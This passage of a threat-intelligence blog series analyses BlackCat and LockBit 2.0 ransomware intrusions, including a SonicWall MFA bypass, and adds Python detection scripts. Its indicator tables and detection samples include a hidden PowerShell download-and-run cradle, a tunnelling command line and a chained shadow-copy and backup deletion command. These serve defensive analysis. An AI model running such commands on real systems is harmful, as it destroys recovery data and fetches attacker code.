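    {"image": r"C:\Windows\locker.exe",
     "cmdline": r'"C:\Windows\locker.exe" --access-token 1a2b -v --no-prop-servers \\dc01 --propagated'},
    {"image": r"C:\ProgramData\AdFind.exe", "cmdline": "AdFind.exe -f objectcategory=person"},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmdline": "firefox.exe"},
]

if __name__ == "__main__":
    for name, ev in detect(SAMPLE_EVENTS):
        print(f"{name}: {ev['cmdline']}")
```

The rules are deliberately narrow so each one maps to a single stage of the intrusion; in a SIEM the shadow-copy and locker rules warrant an immediate page, while the cradle, masquerade and rclone rules are the earlier, quieter signals that would have been visible on the anti-virus management server had it carried an EDR agent.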

Conclusion

BlackCat affiliates work on behalf of the BlackCat group to conduct human-operated ransomware campaigns that are opportunistic in nature. With a sophisticated toolkit and various evasion tactics, including the Rust-written malware and its self-propagating features, BlackCat RaaS poses a significant threat to organisations with conventional security systems. Organisations are encouraged to review the TTPs leveraged by BlackCat affiliates, as seen in our recent incident response experience, to improve their preventative and detective controls.

Recommendations

As mentioned in the previous blog posts, defending against human-operated ransomware incidents is extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, atop those already listed in the previous blog post:

  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to defend against human-operated ransomware incidents.
  • Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
  • Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
  • Monitor for malicious account and group policy creation to identify unauthorised changes and misconfigurations in your organisation’s network environment.
  • Regularly perform a review for network and host-based assets for complete stock-taking to identify unpatched or misconfigured devices. Specifically, to maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
  • Create a blacklist for the identified indicators of compromise (“IOC”) shared below to enable network-wide blocking and detection of attempted entry or attack and set up ongoing monitoring on the dark web and BlackCat leak site.

In addition, we strongly urge organisations that have deployed the vulnerable versions of Windows operating systems to execute the remediation actions outlined in the blog post, if not already completed. 

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Active Scanning – T1595
  • Gather Victim Identity Information: Credentials – T1589.001
  • Account Discovery: Domain Account – T1087.002
  • Valid Accounts – T1078
  • Domain Accounts – T1078.002
  • Command and Scripting Interpreter – T1059
  • External Remote Services – T1133
  • Domain Trust Discovery – T1482
  • Remote System Discovery – T1018
  • Impair Defenses – T1562
  • OS Credential Dumping – T1003
  • File and Directory Discovery – T1083
  • Network Service Discovery – T1046
  • Network Share Discovery – T1135
  • System Information Discovery – T1082
  • Remote Access Software – T1219
  • Data Encrypted for Impact – T1486
  • Service Stop – T1489
  • Web Service – T1102
  • Lateral Tool Transfer – T1570
  • Remote Services – T1021
  • System Services: Service Execution – T1569.002
  • Ingress Tool Transfer – T1105
  • Remote Services: SMB/Windows Admin Shares – T1021.002
  • Exfiltration Over Web Service: Exfiltration to Cloud Storage – T1567.002
  • Transfer Data to Cloud Account – T1537

Indicators of Compromise (IoCs)

Indicator | Type
C:\users\kenscchoi\desktop\sharefinder.ps1 | Script
svchost.exe -connect ip:8443 -pass password | Process execution
powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http[:]//ip[:]80/a')) | PowerShell execution
C:\Users\<user>\Desktop\locker.exe | Executable file
C:\Windows\locker.exe | Executable file
C:\ProgramData\AdFind.exe | Executable file
C:\ProgramData\system\svchost.exe | Executable file
C:\ProgramData\svchost.exe | Executable file
C:\users\<user>\videos\beacon.exe | Executable file
ProgramDataLocalSystem/Upload/beacon.exe | Executable file
SYSVOL\Users\<user>\Videos\beacon.exe | Executable file
C:\admin\.exe | Executable file
C:\windows\users\test\pictures\64\86.exe | Executable file
C:\windows\users\test\pictures\WebBrowserPassView.exe | Executable file
C:\windows\users\test\pictures\PsExec64.exe | Executable file
C:\windows\users\test\pictures\PsExec.exe | Executable file
C:\windows\users\test\pictures\Advanced_Port_Scanner_2.5.3869.exe | Executable file
C:\windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet | Command execution


Technical analysis of Lockbit 2.0 affiliates’ SonicWall exploit that bypasses MFA  

We outline the tactics, techniques and procedures of the threat actor, and share the technical details of the indicators of compromise for one of our incident response experiences in 1H2022.

In the previous blog post, we reported on the novel technique leveraged by LockBit 2.0 affiliates to  exploit SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSL VPN) appliance to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the multi-factor authentication (MFA) access control. We identified at the point in time from open source internet search engines that over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances.

We follow-up on that blog post with a technical analysis that outlines the LockBit 2.0 affiliates’ Tactics, Techniques and Procedures (TTPs) as observed in our incident response experiences. In addition, we set the scene for our final blog post which will explore the potential factors that enables the LockBit Ransomware-as-a-Service (RaaS) group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Analysis and Exploitation in the wild

Reconnaissance

We observed through analysis on the SSLVPN appliance and firewall network traffic logs that either CVE-2019-7481 or CVE-2021-20028 was exploited twice prior to initial access. The first recorded instance was in late 2021, in which the affiliate obtained the credentials of an administrative account. We conclude this with high confidence given this credential had not been leaked via data breaches or to the Dark Web previously, while the user had adopted a strong password given its length and use of four password complexity character classes.

Over the next three months, each login attempt originated from a unique external IP address and were unsuccessful due to the enforcement of MFA. The exploit was executed again prior to successful initial access, again from a different IP address. The use of a different external IP address each time spread over a sporadic timeframe is a strong indication of likely malicious intent by a threat actor that sought to remain stealthy to avoid detection and triggering of the victim’s incident response protocols.

The known malicious IP addresses are listed below; we posit with high confidence that they were utilised by the same threat actor, for the following reasons:

  • 91.219.212[.]214 – the first observed exploiting an SQLi vulnerability. This IP address has been reported multiple times as malicious from reputable sources to have conducted suspicious malicious activities, including spam, brute-forcing, web application abuse, and vulnerability exploitation.[1] 
  • 5.206.224[.]246 – the first unsuccessful attempt to login as an administrative user, suggesting that this IP address is associated with 91.219.212[.]214 to obtain and utilise the strong and complex password.
  • 51.91.221[.]111 – which resolves to 213.186.33[.]5 and has been flagged by the security community to be malicious and has served as a command-and-control infrastructure, i.e., Cobalt Strike server.[2]
  • 194.195.91[.]29 – the second observed exploitation of the SQLi vulnerability, with the subsequent login attempt being successful, indicating that the threat actor likely had chained it with the undisclosed zero-day vulnerability.

Initial Access

The threat actor gained access to the victim network by chaining an SQLi vulnerability – one of CVE-2019-7481 or CVE-2021-20028 – with an undisclosed zero-day vulnerability to circumvent the MFA access control of the victim’s SonicWall SRA SSLVPN. Details of the vulnerability chaining are illustrated in the below diagram.

Figure 1 – Holistic vulnerability chaining of SQLi vulnerability with undisclosed post-authentication zero-day vulnerability

Through our systematic method for discovering and analysing attack paths, we were able to replicate the exploited zero-day vulnerability performed by the threat actor. A summary of the undisclosed post-authentication local file inclusion zero-day vulnerability is provided below:

CVE(s): CVE-2022-22279
First Published Date: 11 March 2022
CVSS v3: 4.9
Affected Versions: SonicWall SMA100 version 9.0.0.9-26sv and earlier.[3]
Description: Post-authentication vulnerability that enables threat actors to download the persist.db database to their local device by targeting the /cgi-bin/sslvpnclient endpoint, and then extract valid user credentials from the settings.json file, including usernames, encrypted passwords and TOTP seeds.[4]
Potential Impact: Sensitive information disclosure that enables threat actors to circumvent the MFA access control, impersonate valid users and obtain initial access to the victim’s network.
Proof of Concept (PoC) Available: At the time of writing, there were no publicly available PoCs identified. Dark Lab reported the security vulnerability along with a PoC exploit to SonicWall’s Product Security Incident Response Team (PSIRT), and on 12 April 2022 observed the release of the advisory acknowledging the vulnerability we had disclosed.
Exploited in the Wild: At the time of writing, this vulnerability is not known to be exploited in the wild beyond the incident described here.
Patch Available: No
Workaround Available: No

However, the threat actor required valid user credentials to exploit the post-authentication zero-day vulnerability. Based on this requirement and the victim’s firmware, we identified two pre-authentication SQLi vulnerabilities – CVE-2019-7481 and CVE-2021-20028 – that the threat actor may have leveraged to obtain a valid session. A summary of these vulnerabilities is provided below:

CVE(s): CVE-2019-7481
First Published Date: 18 December 2019
CVSS v3: 7.5
Affected Versions: Per SonicWall’s PSIRT, SMA100 version 9.0.0.3 and earlier.[5] However, we noted from a cybersecurity consultancy firm that devices with version 9.0.0.5 firmware and earlier were still vulnerable.[6]
Description: Pre-authentication SQLi vulnerability in the customerTID parameter which can be exploited remotely. Successful exploitation would allow the threat actor to list active session identifiers for authenticated users in a table named Sessions.[7]
Potential Impact: Sensitive information disclosure and initial access under the right conditions (i.e., no MFA access control).
Proof of Concept (PoC) Available: At the time of writing, no publicly available PoCs were identified. However, security researchers have reportedly reproduced the exploit based on samples obtained from in-the-wild exploitation.[8]
Exploited in the Wild: This vulnerability has reportedly been actively exploited in the wild since 8 June 2021.[9] SonicWall’s PSIRT published a notification on 13 July 2021 detailing an incident leveraging this vulnerability to perform a targeted ransomware attack.[10]
Patch Available: Yes for organisations running 9.x firmware. No for organisations running unpatched and end-of-life (EOL) 8.x firmware.[11]
Workaround Available: No

CVE(s): CVE-2021-20028
First Published Date: 14 July 2021
CVSS v3: 9.8
Affected Versions: SonicWall SRA appliances running all 8.x firmware, an old version of firmware 9.x (9.0.0.9-26sv or earlier), or version 10.2.0.7.[12] However, we noted from a cybersecurity consultancy firm that devices with version 10.x firmware were potentially vulnerable.[13]
Description: Pre-authentication SQLi vulnerability in the customerTID parameter which can be exploited remotely. Successful exploitation would allow the threat actor to list active session identifiers for authenticated users in a table named Sessions.[14]
Potential Impact: Sensitive information disclosure and initial access under the right conditions (i.e., no MFA access control).
Proof of Concept (PoC) Available: Per Twitter threads, we understand that the PoC was leaked on paste bins[15] by an alleged DarkSide and LockBit affiliate going by the name “Wazawaka” on 25 January 2022.[16] While the leak site is now inaccessible, we noted that security researchers have reportedly reproduced the exploit.[17][18][19]
Exploited in the Wild: No known mass exploitation in the wild.
Patch Available: Yes for organisations running 9.x firmware. No for organisations running unpatched and end-of-life (EOL) 8.x firmware.[20]
Workaround Available: No

Establishing Persistence

Upon login via the built-in SonicWall SRA SSLVPN administrative account, the threat actor did not need to perform privilege escalation: the account they obtained was, under the configuration at the time, integrated with the victim’s Active Directory and had been assigned domain administrator privileges. The threat actor then cemented their position by creating an Active Directory account named “audit” with similar privileges, and performed the majority of subsequent malicious activity using this user.

Discovery

The threat actor transferred the SoftPerfect Network Scanner tool, a publicly available network scanner that discovers hostnames and network services over protocols such as Hypertext Transfer Protocol (HTTP), Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), and Secure Shell (SSH).[21] The threat actor launched the scanner to map out the internal network topology and identify additional critical systems.

Filename: netscan.exe
SHA-256: a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789
File type: Win32 EXE
File size: 16,539,648 bytes

Lateral Movement

Subsequent to identifying the critical systems such as backup servers and the management information system, the threat actor leveraged the stolen administrative account as well as the created account “audit” to initiate a Remote Desktop Connection to access those endpoints.

Defense Evasion

The kavremover tool was staged and executed to disable the endpoint anti-virus solution Kaspersky on the critical systems.[22] This helped to set up the next stage of the campaign, which focuses on the exfiltration of victim data that will later be used for ransom.

Filename: kavremvr.exe
SHA-256: c230e6a2a4f4ac182ba04fee875f722a2c9690cb5d678acd5e40a72d5ec1f275
File type: Win32 EXE
File size: 14,143,976 bytes

In addition, the executable file YDArk.exe was located on selected endpoints. This open source tool was first observed in the wild on 11 June 2020[23], with the commit available on GitHub for download.[24] From public sources, we note that it is a multi-purpose toolkit offered with English and Chinese modules that allows the threat actor to evade defences through various techniques, including process injection and rootkit capabilities.[25] As a result, we posit this tool was downloaded with the intention of disabling anti-virus solutions such as Windows Defender, alongside the kavremover tool.

Exfiltration and Extortion

Initially, the threat actor makes it known to the victim that the network has been encrypted by leaving a ransom note on the impacted systems. In some cases, LockBit affiliates have been observed staging hacking tools and exfiltrating data to cloud storage platforms such as AnonFiles, which lets users anonymously upload and share content.[26][27]

Exfiltration and Extortion

Ransomware deployment was observed to have been done manually, with the threat actors executing it on the critical servers. Following the execution of Lockbit 2.0, threat actors typically move on to the extortion phase of the campaign, which is broken down into two stages: an initial ransom note, and a leak website.

Filename: LockBit_9C11F98C309ECD01.exe
SHA-256: 822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7
File type: Win32 EXE
File size: 982,528 bytes

Above is a sample of the Lockbit 2.0 ransomware; below are several behaviours observed in our incident from the available logs.

  • The ransomware enumerated connected drives and read the root path of hard drives other than the default C: drive, discovering additional drives connected to the infected system to which it was able to propagate and encrypt.
  • The ransomware deleted the Volume Shadow Copies (Volume Shadow Copy Service, VSS), likely by running the following command:
    • C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  • Files successfully encrypted by Lockbit 2.0 had their file extension changed to .lockbit. Unlike typical cases, we did not observe the desktop wallpaper being modified via the \REGISTRY\USER\Control Panel\Desktop\Wallpaper registry key.
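
The chained command above is a classic Inhibit System Recovery (T1490) pattern, and each of its sub-commands is individually detectable in process-creation telemetry. The following is an added example written for this post (it is not DarkLab’s code or tooling): it splits a cmd.exe command line on its chaining operators, matches each sub-command against a small rule set, and rates the result higher when several recovery-inhibiting actions appear together, as they do in the observed command. The rule names, the regular expressions and the sample command lines are all assumptions constructed for this example; the first sample reproduces the command line quoted above.

```python
import re

# Constructed sample process-creation command lines (not from the incident logs).
# The first reproduces the command attributed to the ransomware in this post.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete "
    r"& bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} "
    r"recoveryenabled no & wbadmin delete catalog -quiet",
    r"C:\Windows\System32\vssadmin.exe list shadows",            # benign admin query
    r"C:\Windows\System32\bcdedit.exe /set {default} recoveryenabled yes",  # re-enabling recovery
    r'"C:\Program Files\Backup\agent.exe" --schedule nightly',  # unrelated process
]

# Detection rules: (name, ATT&CK technique, pattern). Constructed for this example;
# tune them against your own telemetry before relying on them.
RULES = [
    ("vss_shadow_delete", "T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("wmic_shadowcopy_delete", "T1490",
     re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("bcdedit_disable_recovery", "T1490",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("bcdedit_ignore_failures", "T1490",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("wbadmin_delete_catalog", "T1490",
     re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I)),
]


def split_chained_commands(cmdline):
    """Split a cmd.exe command line on '&&', '&' and '||' so each sub-command
    is evaluated on its own (the observed command chains five of them)."""
    parts = re.split(r"\s*(?:&&|&|\|\|)\s*", cmdline)
    return [p.strip() for p in parts if p.strip()]


def match_rules(cmdline):
    """Return the names of every rule triggered by one process command line."""
    hits = []
    for sub in split_chained_commands(cmdline):
        for name, _technique, pattern in RULES:
            if pattern.search(sub) and name not in hits:
                hits.append(name)
    return hits


def score(cmdline):
    """One shadow-copy deletion may be legitimate maintenance; several
    recovery-inhibiting actions in a single command line is the ransomware shape."""
    hits = match_rules(cmdline)
    severity = "high" if len(hits) >= 2 else ("medium" if hits else None)
    return {"hits": hits, "severity": severity}


def scan(command_lines=SAMPLE_COMMAND_LINES):
    """Score every sample command line; returns (command_line, result) pairs."""
    return [(c, score(c)) for c in command_lines]


if __name__ == "__main__":
    for cmd, result in scan():
        print(result["severity"], result["hits"], cmd[:60])
```

Run against the samples, only the first command line scores high (all five rules fire); the `vssadmin list` and `recoveryenabled yes` lines score nothing, which is the point of matching on the destructive verbs rather than on the binary names alone.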

Finally, we observed that all the Active Directory accounts were disabled by the threat actor after the execution of Lockbit 2.0. In doing so, legitimate users (e.g., administrators) were prevented from accessing their accounts, thereby delaying the actions that could be taken to restore the impacted systems and network.

Conclusion

Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. Organisations are encouraged to review the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience to improve their preventive and detective controls.

Recommendations

As mentioned in the previous blog post, defending against undisclosed exploits is extremely challenging, but not impossible if organisations adopt a defence-in-depth approach. The following guiding principles should be observed, on top of those already listed in the previous blog post:

  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically, maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
  • Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
  • Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as through deployment of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.

In addition, we strongly urge organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN to execute the remediation actions outlined in the previous blog post, if not already completed. Details can be found here.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Reconnaissance: Active Scanning – Vulnerability Scanning (T1595.002)
  • Reconnaissance: Gather Victim Network Information – IP Addresses (T1590.005)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Persistence: Account Manipulation (T1098)
  • Persistence: Create Account: Domain Account (T1136.002)
  • Privilege Escalation: Domain Accounts (T1078.002)
  • Defense Evasion: Impair Defenses: Disable or Modify Tools (T1562.001)
  • Defense Evasion: Indicator Removal on Host: File Deletion (T1070.004)
  • Credential Access: Credentials from Password Stores (T1555)
  • Discovery: Network Service Scanning (T1046)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Remote System Discovery (T1018)
  • Lateral Movement: Remote Services: Remote Desktop Protocol (T1021.001)
  • Collection: Data from Local System (T1533)
  • Command and Control: Remote File Copy (T1544)
  • Impact: Account Access Removal (T1531)
  • Impact: Data Encrypted for Impact (T1486)
  • Impact: Inhibit System Recovery (T1490)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

Indicator – Type
c230e6a2a4f4ac182ba04fee875f722a2c9690cb5d678acd5e40a72d5ec1f275 – SHA-256
a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789 – SHA-256
49bac09d18e35c58180ff08faa95d61f60a22fbb4186c6e8873c72f669713c8c – SHA-256
822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7 – SHA-256
91.219.212[.]214 – IPv4 Address
5.206.224[.]246 – IPv4 Address
51.91.221[.]111 – IPv4 Address
213.186.33[.]5 – IPv4 Address
194.195.91[.]29 – IPv4 Address
kavremvr.exe – Executable File
netscan.exe – Executable File
LockBit_9C11F98C309ECD01.exe – Executable File
YDArk.exe – Executable File
.lockbit – Encrypted Files Extension
Restore-My-Files[.]txt – Filename
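
The IoC list above mixes hashes, defanged IP addresses, executable names, a file extension and a ransom-note filename, each of which needs a different matching rule to be useful in a log search. The following is an added example (not DarkLab’s code) that loads the indicators exactly as published, refangs the “[.]” notation in memory, builds one boundary-aware pattern per indicator type, and sweeps a handful of constructed log lines. The log lines, hostnames, timestamps and the loose “timestamp host source message” layout are assumptions made for this example; only the indicator values come from the post.

```python
import re

# IoCs transcribed from the table above. IPs and the note filename are kept
# defanged ("[.]") exactly as published and are refanged only in memory.
REPORTED_IOCS = [
    ("c230e6a2a4f4ac182ba04fee875f722a2c9690cb5d678acd5e40a72d5ec1f275", "SHA-256"),
    ("a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789", "SHA-256"),
    ("49bac09d18e35c58180ff08faa95d61f60a22fbb4186c6e8873c72f669713c8c", "SHA-256"),
    ("822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7", "SHA-256"),
    ("91.219.212[.]214", "IPv4 Address"),
    ("5.206.224[.]246", "IPv4 Address"),
    ("51.91.221[.]111", "IPv4 Address"),
    ("213.186.33[.]5", "IPv4 Address"),
    ("194.195.91[.]29", "IPv4 Address"),
    ("kavremvr.exe", "Executable File"),
    ("netscan.exe", "Executable File"),
    ("LockBit_9C11F98C309ECD01.exe", "Executable File"),
    ("YDArk.exe", "Executable File"),
    (".lockbit", "Encrypted Files Extension"),
    ("Restore-My-Files[.]txt", "Filename"),
]

# Constructed sample log lines (not from the incident): "timestamp host source message".
SAMPLE_LOGS = [
    "2022-03-10T02:14:07Z fw01 firewall ALLOW tcp 10.0.5.21:50412 -> 51.91.221.111:443",
    "2022-03-10T02:20:41Z srv-backup sysmon ProcessCreate Image=C:\\Temp\\netscan.exe "
    "Hashes=SHA256=A710F573F73C163D54C95B4175706329DB3ED89CD9337C583D0BB24B6A384789",
    "2022-03-10T03:02:55Z srv-mis sysmon FileCreate TargetFilename=D:\\Finance\\Q4.xlsx.lockbit",
    "2022-03-10T03:03:01Z srv-mis sysmon FileCreate TargetFilename=D:\\Finance\\Restore-My-Files.txt",
    "2022-03-10T03:05:12Z ws-017 sysmon ProcessCreate Image=C:\\Windows\\System32\\notepad.exe",
]


def refang(value):
    """Turn a defanged indicator ("1.2.3[.]4", "note[.]txt") back into its live form."""
    return value.replace("[.]", ".")


def compile_iocs(iocs=REPORTED_IOCS):
    """One compiled pattern per indicator. Hashes match case-insensitively (tools
    emit them in either case); the extension must end a path token so it does not
    fire inside unrelated names; every other value is a literal delimited by
    non-identifier characters, so 213.186.33.5 cannot match 213.186.33.50."""
    compiled = []
    for raw, kind in iocs:
        live = re.escape(refang(raw))
        if kind == "Encrypted Files Extension":
            pattern = live + r"(?=\s|$)"
        else:
            pattern = r"(?<![\w.])" + live + r"(?![\w.])"
        compiled.append((raw, kind, re.compile(pattern, re.IGNORECASE)))
    return compiled


def scan_logs(lines=SAMPLE_LOGS, iocs=None):
    """Return (line_number, indicator_as_published, type) for every IoC hit."""
    iocs = iocs or compile_iocs()
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for raw, kind, pattern in iocs:
            if pattern.search(line):
                hits.append((lineno, raw, kind))
    return hits


if __name__ == "__main__":
    for lineno, raw, kind in scan_logs():
        print(f"line {lineno}: {kind} {raw}")
```

On the constructed lines this reports the C2 address on the firewall line, both the filename and the SHA-256 of netscan.exe on the same Sysmon event, the .lockbit extension and the ransom note, and nothing on the benign notepad.exe event. Keeping the indicators defanged in the source list means the file can be shared or committed without tripping URL-scanning tooling, while the refanging step keeps the matching exact.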

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Lockbit 2.0 affiliate’s new SonicWall exploit bypasses MFA

Increasing Capabilities of LockBit 2.0 Gang Per Our Incident Response Experience in Q1 2022 Impacts Over One Hundred Hong Kong and Macau Organisations; Exploit Acknowledged by SonicWall as CVE-2022-22279

In the first quarter of 2022, DarkLab responded to several ransomware incidents impacting organisations in the financial services, real estate, and manufacturing sectors across Hong Kong, China and Asia Pacific. In all such incidents, the presence of the LockBit executable file, .lockbit extension files, and the StealBit malware suggests that affiliates of the cybercriminal group that operates the LockBit 2.0 Ransomware-as-a-Service (RaaS) were likely behind the incidents.

LockBit 2.0 RaaS is a well-documented group with established tactics, techniques and procedures (TTPs) that has been active since 2019.[1] During our incident response investigations, we found LockBit affiliates exploiting two victims’ SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSLVPN) appliances to establish a foothold in their networks. In the first instance, the affiliate exploited a known SQL injection (SQLi) vulnerability to obtain valid usernames and passwords. Given that the multi-factor authentication (MFA) access control was not enabled, they were able to achieve initial access relatively easily. In the second instance, the affiliate performed follow-up actions to retrieve the time-based one-time password (TOTP), which enabled the circumvention of the MFA access control.

In this blog post we will report on their novel technique to exploit SonicWall SSLVPN appliances and bypass MFA. According to results from open source internet search engines, over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances. This exploit disclosed by DarkLab has since been acknowledged by SonicWall as CVE-2022-22279.

A second blog post will then outline the LockBit affiliates’ TTPs as observed in our incident response experience. The final blog post will explore the potential factors that enable the LockBit RaaS group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Initial Access

The typical modus operandi of LockBit 2.0 affiliates is to gain access to a victim network by exploiting known vulnerabilities in public-facing services, including vulnerable SSLVPN. In particular, CVE-2018-13379 [2] has been the preferred vulnerability in many incidents, including those DarkLab responded to in January and February 2022. The vulnerability is several years old, and LockBit 2.0 affiliates were still able to capitalise on the exploit, which allows unauthenticated users to download system files through crafted HTTP resource requests. Other affiliates have been reported to gain initial access by conducting Remote Desktop Protocol (RDP) brute forcing[3] or through purchasing access to compromised servers via underground markets.[4]

However, in two incidents that DarkLab responded to in March 2022 we observed a new infection vector. Affiliates were observed to exploit a known but relatively obscure SQLi vulnerability – either CVE-2019-7481 [5] or CVE-2021-20028 [6] – in a novel manner to retrieve user session data stored in the SonicWall SSLVPN appliance to the affiliate’s local endpoint. Retrieved data included valid usernames, passwords, and the TOTP. In doing so, the affiliates could circumvent the MFA access control, impersonate any user to gain initial access, and subsequently deploy ransomware.

Figure 1 – LockBit’s initial attack chain

The latter incidents we responded to in March 2022 were noteworthy for two reasons. First, LockBit affiliates had not been reported to exploit SonicWall SSLVPN products in the past. Second, this was the first publicly observed instance of the known SQLi vulnerability being exploited by threat actors to extract the TOTP SHA-1 tokens of onboarded users. Affiliates could then generate the QR code containing the required information to generate one-time passwords (OTP) in an authenticator app of their choice.[7] This proved to be an innovative way to circumvent the existing MFA access controls. The observed exploitation suggests that LockBit’s affiliates now have additional tools in their arsenal, and indicates the importance they place on continuous improvement as the group looks to differentiate itself from competitors.

Impact to Hong Kong and Macau

DarkLab replicated and verified the novel exploitation method of the post-authentication vulnerability through internal testing of several known impacted SonicWall SSLVPN firmware. We have shared all relevant details, including the technical exploit code, with the SonicWall Product Security Incident Response Team (PSIRT) in March 2022 to ensure organisations are protected. We will not publicly disclose exact exploitation details to avoid replication by malicious actors.

Per subsequent communications with SonicWall PSIRT, we understood that the upgrades to SonicWall SMA firmware 10.2.0.7-34sv or above, and 9.0.0.10-28sv or above in February 2021 to address CVE-2021-20016 included comprehensive code-strengthening that proactively prevented malicious attackers from exploiting this vulnerability to circumvent the MFA access control.[8] On 12 April 2022, SonicWall PSIRT released the following advisory acknowledging the vulnerability CVE-2022-22279 which we had disclosed.[9]

As of the time of writing, we have not observed from our deep and dark web monitoring any specific intentions by threat actors to leverage this post-authentication vulnerability to target organisations in Hong Kong and Macau. However, we observed that Russian-speaking threat actors had been discussing this vulnerability in early February 2022, with posts from two underground forums – exploit[.]in and xss[.]is – containing conversation details of purchasing the exploit code and outlining at a high level the follow-up actions that can be taken to extract the TOTP from the active session ID.

Figure 2 – Screenshot of exploit[.]in underground forum
Figure 3 – Screenshot of xss[.]is underground forum

As a result of the LockBit incidents and various hacker chatter, we were concerned that local organisations may have missed SonicWall PSIRT’s advisory note; after all, we still observed compromises that resulted from the exploitation of CVE-2018-13379 on unpatched Fortinet SSLVPN appliances in February 2022. To that end, we conducted a passive, non-intrusive scan for both CVE-2019-7481 and CVE-2021-20028 across the full Internet Protocol address (IP address) range of Hong Kong and Macau. The preliminary results indicated that at least 100 organisations were vulnerable to CVE-2021-20028, with half of those also vulnerable to CVE-2019-7481.

DarkLab has since proactively contacted dozens of potentially affected organisations to alert them of the risks they faced. However, given that a series of critical vulnerabilities pertaining to SonicWall SSLVPN appliances was released in June 2021, it is likely that those may be exploited through other innovative methods by threat actors. For example, the Cybersecurity & Infrastructure Security Agency (CISA) listed CVE-2021-20016 as another SQLi vulnerability that allows a remote unauthenticated attacker to perform an SQL query to access username, password and other session-related information in SMA100 build version 10.x,[10] which aligned with our communication with SonicWall’s PSIRT. We foresee that, if left unpatched, this vulnerability poses a threat that adversaries may exploit to gain unauthorised access.

CVE Number – Product – Vulnerability Name – Date Added to Catalogue – Short Description
CVE-2021-20021 – SonicWall Email Security – Privilege Escalation Exploit Chain – 3 November 2021 – A vulnerability in version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
CVE-2021-20022 – SonicWall Email Security – Privilege Escalation Exploit Chain – 3 November 2021 – A vulnerability in version 10.0.9.x allows a post-authenticated attacker to upload an arbitrary file to the remote host.
CVE-2021-20023 – SonicWall Email Security – Privilege Escalation Exploit Chain – 3 November 2021 – A vulnerability in version 10.0.9.x allows a post-authenticated attacker to read an arbitrary file on the remote host.
